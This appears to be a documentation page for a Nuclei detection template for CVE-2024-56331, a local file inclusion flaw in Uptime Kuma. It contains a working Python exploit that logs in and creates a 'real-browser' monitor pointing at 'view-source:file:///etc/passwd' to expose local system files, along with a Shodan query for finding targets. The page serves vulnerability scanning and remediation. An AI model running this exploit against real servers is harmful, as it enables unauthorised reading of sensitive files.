Skip to content
Nuclei Templates

Uptime-Kuma - Local File Inclusion (LFI)

ID: CVE-2024-56331

Severity: critical

Author: hyni03

Tags: cve,cve2024,lfi,uptime-kuma,file-disclosure

Description

Section titled “Description”

Uptime Kuma has an Improper URL Handling vulnerability that can be exploited through the “real-browser” feature.By providing a URL using the file:/// protocol (e.g., file:///etc/passwd), an attacker can obtain a screenshotof local sensitive files, because the user input is not validated by the server.

YAML Source

Section titled “YAML Source”
id: CVE-2024-56331


info:
  name: Uptime-Kuma - Local File Inclusion (LFI)
  author: hyni03
  severity: critical
  description: |
    Uptime Kuma has an Improper URL Handling vulnerability that can be exploited through the "real-browser" feature.
    By providing a URL using the file:/// protocol (e.g., file:///etc/passwd), an attacker can obtain a screenshot
    of local sensitive files, because the user input is not validated by the server.
  impact: |
    An authenticated user can exploit this vulnerability to access arbitrary local files by leveraging
    the "real-browser" feature, leading to potential information disclosure of sensitive system files.
  remediation: |
    This vulnerability is fixed in version 1.23.16. Users are advised to upgrade to the latest version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-56331
    - https://github.com/griisemine/CVE-2024-56331
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 6.8
    cve-id: CVE-2024-56331
    cwe-id: CWE-22
  metadata:
    verified: true
    shodan-query: http.title:"Uptime Kuma"
    product: uptime-kuma
    vendor: uptime-kuma
  tags: cve,cve2024,lfi,uptime-kuma,file-disclosure


variables:
  username: "{{username}}"
  password: "{{password}}"
  HOST: "{{Hostname}}"


code:
  - engine:
      - py
      - python3  # Requires python installation on the system
    source: |
        import os
        import time


        try:
          import socketio
        except ImportError:
          raise ImportError("The 'socketio' library is not installed. Please install it using 'pip install python-socketio'.")


        # Load environment variables
        USER = os.getenv('username')
        PASS = os.getenv('password')
        HOST = os.getenv('HOST')
        PORT = os.getenv('PORT')


        # Configuration settings
        CONFIG = {
            "server_url": f"ws://{HOST}",
            "credentials": {"username": USER, "password": PASS},
            "request_types": {"real_browser": "real-browser", "http": "http"},
            "url_prefix": {"view_source": "view-source:file://", "file": "file://"}
        }


        TARGET_FILES = ["/etc/passwd"]


        client = socketio.Client()


        def connect_to_server(url, retries=3, delay=2):
            for attempt in range(retries):
                try:
                    client.connect(url, wait_timeout=10)
                    print(f"[+] Connected to: {url}")
                    return True
                except Exception as e:
                    print(f"[!] Connection attempt {attempt + 1}/{retries} failed: {e}")
                    time.sleep(delay)
            return False


        try:
            if not connect_to_server(CONFIG["server_url"]):
                print("[!] Unable to connect to the server. Exiting.")
                exit(1)


            # Attempt login
            login_resp = client.call("login", {
                "username": CONFIG["credentials"]["username"],
                "password": CONFIG["credentials"]["password"]
            }, timeout=10)


            if login_resp and login_resp.get("ok"):
                print("[+] Login successful")
                # Process each sensitive file request
                for file_path in TARGET_FILES:
                    req_type = CONFIG["request_types"]["real_browser"]
                    # Use view-source prefix in real-browser mode
                    url_prefix = CONFIG["url_prefix"]["view_source"] if req_type == CONFIG["request_types"]["real_browser"] else CONFIG["url_prefix"]["file"]
                    target_url = f"{url_prefix}{file_path}"


                    print(f"[~] Sending {req_type} request for: {target_url}")


                    add_payload = {
                        "type": req_type,
                        "name": f"{req_type} request for {file_path}",
                        "url": target_url,
                        "method": "GET",
                        "maxretries": 0,
                        "timeout": 500,
                        "ignoreTls": True,
                        "accepted_statuscodes": ["200-299"],
                        "conditions": "[]"
                    }
                    response = client.call("add", add_payload, timeout=15)
                    print(f"[+] Response for {file_path}: {response}")
            else:
                print("[!] Login failed. Please check credentials.")
        except Exception as err:
            print(f"[!] An error occurred during execution: {err}")
        finally:
            client.disconnect()
            print("[*] Disconnected from the server")


    matchers:
      - type: word
        words:
          - "/etc/passwd: {'ok': True, 'msg': 'successAdded'"
# digest: 4a0a00473045022100df7d5d216b87880a14cc83c6a75207c8abe35918c11518caf6cc303812f77d7102202822e8fce807e7f5e5015788df46b6ecf677ff6ff2dcb6e1e3da8d3976b3ad45:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-56331.yaml"

View on Github